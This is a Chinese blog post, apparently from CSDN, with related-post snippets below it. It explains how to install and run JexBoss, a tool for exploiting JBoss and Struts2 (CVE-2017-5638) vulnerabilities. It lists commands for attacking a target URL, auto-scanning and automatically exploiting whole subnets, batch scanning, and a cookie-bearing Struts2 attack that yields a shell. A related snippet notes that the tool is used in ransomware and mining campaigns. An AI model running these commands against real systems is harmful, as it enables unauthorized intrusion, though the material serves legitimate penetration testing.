随记(七):Jboss漏洞检测利用工具

最新推荐文章于 2026-04-12 09:47:41 发布
原创 最新推荐文章于 2026-04-12 09:47:41 发布 · 5.7k 阅读 · 8 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全 #安全漏洞 #扫描测试工具
Jexboss是一款Python编写的工具,用于检测和利用Jboss框架及其它Java平台的漏洞,包括web-console、jmx-console等。本文介绍如何安装和使用Jexboss,包括基本的命令行选项和高级用法,如网络扫描、批量扫描和针对特定漏洞的攻击。

Jboss漏洞检测利用工具

Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。

工具下载:https://github.com/joaomatosf/jexboss

此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。

0x01 安装方法

## 克隆项目至本地
git clone https://github.com/joaomatosf/jexboss.git
## 切换至项目根目录
cd jexboss
## 安装项目所需要的依赖
pip2 install -r requires.txt
## 使用
python2 jexboss.py -h

在这里插入图片描述

0x02 使用方法

## 攻击目标网站
python2 jexboss.py -u http://192.168.0.26:8080

在这里插入图片描述
在这里插入图片描述

## 网络扫描模式
python2 jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

在这里插入图片描述

## 自动化漏洞利用的网络扫描模式
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

## 自动化漏洞利用的网络扫描模式(多端口)
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080,80,8888 -results results_auto_scan.txt

## 批量扫描
python2 jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log

## 针对 Apache Struts2(CVE-2017-5638漏洞)
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2

## 带Cookie的CVE-2017-5638漏洞利用
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2 --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1487
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
JexBoss:终极JBoss漏洞检测利用工具完全指南
最新发布
gitblog_00168的博客
04-12 1093
JexBoss是一款功能强大的JBoss漏洞检测利用工具,专为安全测试人员和系统管理员设计,可快速识别并验证JBoss应用服务器及其他Java平台中的序列化漏洞。作为一款开源工具,它支持多种漏洞检测模式,帮助用户轻松发现潜在的安全风险并采取相应措施。 ## 🌟 JexBoss核心功能解析 JexBoss的强大之处在于其全面的漏洞检测能力和灵活的使用模式。该工具主要针对JBoss应用服务器3
Jboss(CVE-2017-12149)反序列化命令执行漏洞
weixin_51151498的博客
12-11 2617
Jboss(CVE-2017-12149)反序列化命令执行漏洞
一个简单探测jboss漏洞的工具
网络安全。
02-13 3344
0x01 项目介绍 自研工具。批量探测jboos系列漏洞路径,特别在内网渗透中,提高效率。(此工具仅探测漏洞所在路径,漏洞是否存还需对应exp验证。) 项目地址:https://github.com/GGyao/jbossScan 0x02 jboss漏洞介绍 CVE-2015-7501 JBoss JMXInvokerServlet 反序列化漏洞。此漏洞存在于JBoss中/invoker/JMX...
网安实习05
qq_63440850的博客
07-13 815
网安学习day7:本文记录学习Jboss工具检测漏洞。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
JBOSS使用指南
Constant from time complexity and space complexity of perfect oneself
06-26 2246
                                                                              JBOSS使用指南                                                                              Release v1.0             
Jboss漏洞利用
u011215939的博客
01-23 8865
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
批量勒索挖矿常用漏洞利用工具jexboss的简单分析
si1ence安全博客
08-21 1997
0x0 简介 jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console、jmx-console、JMXInvokerServlet、struc2、Jenkins等漏洞并且可以直接获得一个shell,杀人越货勒索挖矿必备神器。 起初,攻击者会通过JexBoss工具JBoss服务器执行侦查,随后利用漏洞并安装SamSam。与其他勒索软件不同...
POC-bomber终极指南:如何利用高威胁漏洞检测工具快速获取目标权限
gitblog_00020的博客
01-21 583
POC-bomber是一款功能强大的漏洞检测利用工具,专门设计用于利用大量高危害漏洞的POC/EXP快速获取目标服务器权限。这款工具集成了各种危害性大的RCE、任意文件上传、反序列化、SQL注入等高威胁漏洞检测能力,是渗透测试和红队快速打点的利器。 ## 🔥 为什么选择POC-bomber? POC-bomber作为一款专业的**高威胁漏洞检测工具**,具有以下核心优势: - **快速打
Jboss漏洞利用工具
09-01
Jboss漏洞利用的小工具。执行命令一次不行可以尝试多次执行
Struts2及jboss漏洞利用工具
08-06
Struts2及jboss漏洞利用工具。非常好用本人几经尝试过。 Struts2的漏洞实用工具 ,以及jboss的jar cmd运行代码,良心出品
【2024版】最新多款渗透测试实用原创工具来袭!
wuli1024的博客
11-16 467
工具均使用java开发,环境要求:JDK1.8版本java -jar “文件名” 即可打开图形化界面。注意查看"必看操作说明"模块。
JexBoss反序列化漏洞(JMXInvokerServlet)
红队是青春
05-26 1030
## jexboss(JMXInvokerServlet)原理 JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码,可以利用用户传入的方法,反弹shell,拿下服务器权限。 ```python exp下载地址:https://github.com/joaomatosf/jexboss ``` ## 影响范围 JBoss Enterprise Appl.
Burpsuite 指纹特征绕过
Javachichi的博客
12-05 5883
需要高版本 17 + 的 burp 运行插件,可 bypass 网站流量设备的检测,正常抓包。未使用插件前,burp 指纹特征被识别,抓包被拦截。
Jboss漏洞
lhdbk______的博客
08-06 776
常见中间件漏洞Jboss
探索JBoss扫描利器:GGyao/jbossScan
gitblog_00074的博客
04-05 633
探索JBoss扫描利器:GGyao/jbossScan 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个专门针对JBoss应用服务器进行安全漏洞扫描的开源工具。该项目旨在帮助系统管理员和安全研究人员快速、有效地发现并修复JBoss环境中的潜在安全隐患,提高系统的安全性。 技术分析 1. 漏洞检测引擎 项目利用了自动化扫描技术,结合已知的安全漏洞数据库(如CVE),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值